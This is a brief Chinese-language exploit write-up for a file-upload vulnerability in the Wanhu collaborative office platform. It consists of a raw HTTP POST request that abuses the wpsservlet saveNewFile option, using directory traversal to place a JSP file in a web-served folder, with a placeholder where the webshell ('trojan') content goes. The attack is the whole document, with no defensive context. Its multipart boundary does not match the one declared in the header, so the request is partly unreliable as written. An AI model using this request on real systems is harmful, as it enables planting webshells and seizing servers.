万户协同办公平台接口存在文件上传漏洞
万户协同办公平台接口存在文件上传漏洞
POST
/defaultroot/wpsservlet?option=saveNewFile&newdocld=jsp&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
Host:xxx.xxx.xxx.xxx
User-Agent:
Content-Length:266
Cache-Control:max-age=0
Content-Type:multipart/form-data;boundary=803e058d60f347f7b3c17fa95228eca6
Accept-Encoding: gzip,deflate
Connection:close
--221e166d60f34112b3c17fa95818ecfe
Content-Disposition:form-data;name="NewFile";filename="jsp.jsp"
<% jsp 上传的木马地址 %>
--221e166d60f34112b3c17fa95818ecfe--